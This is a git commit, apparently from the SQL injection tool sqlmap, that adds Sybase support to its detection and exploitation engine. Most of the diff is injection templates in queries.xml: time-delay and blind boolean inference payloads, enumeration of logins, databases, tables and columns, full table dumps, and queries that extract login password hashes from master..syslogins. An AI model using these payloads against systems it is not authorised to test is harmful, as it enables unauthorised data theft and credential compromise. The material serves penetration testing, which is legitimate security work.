basic stuff for sybase

stamparm · stamparm · commit f9f79ffbaf92 · 2010-10-12T19:05:12.000Z
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
@@ -33,6 +33,7 @@
 from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import MAXDB_ALIASES
+from lib.core.settings import SYBASE_ALIASES
 
 from plugins.dbms.mssqlserver import MSSQLServerMap
 from plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn
@@ -50,6 +51,8 @@
 from plugins.dbms.firebird.connector import Connector as FirebirdConn
 from plugins.dbms.maxdb import MaxDBMap
 from plugins.dbms.maxdb.connector import Connector as MaxDBConn
+from plugins.dbms.sybase import SybaseMap
+from plugins.dbms.sybase.connector import Connector as SybaseConn
 
 def setHandler():
     """
@@ -58,7 +61,7 @@ def setHandler():
     """
 
     count     = 0
-    dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server", "SQLite", "Microsoft Access", "Firebird", "SAP MaxDB" )
+    dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server", "SQLite", "Microsoft Access", "Firebird", "SAP MaxDB", "Sybase" )
     dbmsMap   = (
                   ( MYSQL_ALIASES, MySQLMap, MySQLConn ),
                   ( ORACLE_ALIASES, OracleMap, OracleConn ),
@@ -68,6 +71,7 @@ def setHandler():
                   ( ACCESS_ALIASES, AccessMap, AccessConn ),
                   ( FIREBIRD_ALIASES, FirebirdMap, FirebirdConn ),
                   ( MAXDB_ALIASES, MaxDBMap, MaxDBConn ),
+                  ( SYBASE_ALIASES, SybaseMap, SybaseConn ),
                 )
 
     for dbmsAliases, dbmsMap, dbmsConn in dbmsMap:
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -71,6 +71,7 @@
                         "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\
                         "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS" )
 MAXDB_SYSTEM_DBS    = ( "SYSINFO", "DOMAIN" )
+SYBASE_SYSTEM_DBS   = ( "master", "model", "sybsystemdb", "sybsystemprocs" )
 
 MSSQL_ALIASES       = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
 MYSQL_ALIASES       = [ "mysql", "my" ]
@@ -80,8 +81,9 @@
 ACCESS_ALIASES      = [ "access", "jet", "microsoft access", "msaccess" ]
 FIREBIRD_ALIASES    = [ "firebird", "mozilla firebird", "interbase", "ibase", "fb" ]
 MAXDB_ALIASES       = [ "maxdb", "sap maxdb", "sap db" ]
+SYBASE_ALIASES      = [ "sybase", "sybase sql server" ]
 
-SUPPORTED_DBMS      = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES
+SUPPORTED_DBMS      = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES
 SUPPORTED_OS        = ( "linux", "windows" )
 
 SQL_STATEMENTS      = {
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
@@ -103,7 +103,8 @@ def checkDbms(self):
         if conf.direct:
             result = True
         else:
-            payload = agent.fullPayload(" AND LEN(@@VERSION)=LEN(@@VERSION)")
+            randInt = randomInt()
+            payload = agent.fullPayload(" AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d))" % (randInt, randInt))
             result  = Request.queryPage(payload)
 
         if result:
diff --git a/xml/errors.xml b/xml/errors.xml
@@ -78,4 +78,10 @@
         <error regexp="Warning.*maxdb.*"/>
     </dbms>
 
+    <!-- Sybase -->
+    <dbms value="Sybase">
+        <error regexp="Warning.*sybase.*"/>
+        <error regexp="Sybase.*Server message.*"/>
+    </dbms>
+
 </root>
diff --git a/xml/queries.xml b/xml/queries.xml
@@ -428,4 +428,65 @@
         <substring query="SUBSTR((%s), %d, %d)"/>
    </dbms>
 
+    <!-- Sybase -->
+    <dbms value="Sybase">
+        <cast query="CAST(%s AS VARCHAR(8000))"/>
+        <length query="LTRIM(STR(LEN(%s)))"/>
+        <isnull query="ISNULL(%s, ' ')"/>
+        <delimiter query="+"/>
+        <limit query="SELECT TOP %d "/>
+        <limitregexp query="TOP\s+([\d]+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+?\s+NOT\s+IN\s+\(SELECT\s+TOP\s+([\d]+)\s+"/>
+        <limitgroupstart query="2"/>
+        <limitgroupstop query="1"/>
+        <limitstring/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*"/>
+        <timedelay query="WAITFOR DELAY '0:0:%d'"/>
+        <substring query="SUBSTRING((%s), %d, %d)"/>
+        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
+        <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
+        <banner query="SELECT @@VERSION"/>
+        <current_user query="SELECT SUSER_NAME()"/>
+        <current_db query="SELECT DB_NAME()"/>
+        <is_dba query="PATINDEX('%sa_role%', SHOW_ROLE())>0"/>
+        <users>
+            <inband query="SELECT name FROM master..syslogins ORDER BY 1" query2="SELECT name FROM sys.sql_logins ORDER BY 1"/>
+            <blind query="SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins)" query2="SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins" count2="SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins"/>
+        </users>
+        <passwords>
+            <inband query="SELECT name, password FROM master..syslogins" query2="SELECT name, password_hash FROM sys.sql_logins" condition="name"/>
+            <blind query="SELECT TOP 1 password FROM master..syslogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..syslogins WHERE name='%s')" query2="SELECT TOP 1 password_hash FROM sys.sql_logins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..syslogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
+        </passwords>
+        <privileges/>
+        <roles/>
+        <dbs>
+            <inband query="SELECT name FROM master..sysdatabases ORDER BY 1"/>
+            <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U') ORDER BY 1"/>
+            <blind query="SELECT TOP 1 name FROM %s..sysobjects WHERE type IN ('U') AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE type IN ('U'))" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')"/>
+        </tables>
+        <columns>
+            <inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>
+            <blind query="SELECT %s..syscolumns.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')" condition="[DB]..syscolumns.name"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s..%s"/>
+            <blind query="SELECT TOP 1 %s FROM %s..%s WHERE %s NOT IN (SELECT TOP %d %s FROM %s..%s)" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT name FROM master..sysdatabases WHERE " condition="name"/>
+            <blind query="SELECT name FROM master..sysdatabases WHERE " count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases WHERE " condition="name"/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U') AND " condition="name" condition2="name"/>
+            <blind query="" query2="SELECT name FROM %s..sysobjects WHERE type IN ('U') " count="" count2="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')" condition="name" condition2="name"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT %s..sysobjects.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" condition="[DB]..syscolumns.name"/>
+            <blind query="" query2="SELECT %s..sysobjects.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" count="" count2="SELECT COUNT(%s..sysobjects.name) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" condition="[DB]..syscolumns.name"/>
+        </search_column>
+    </dbms>
 </root>
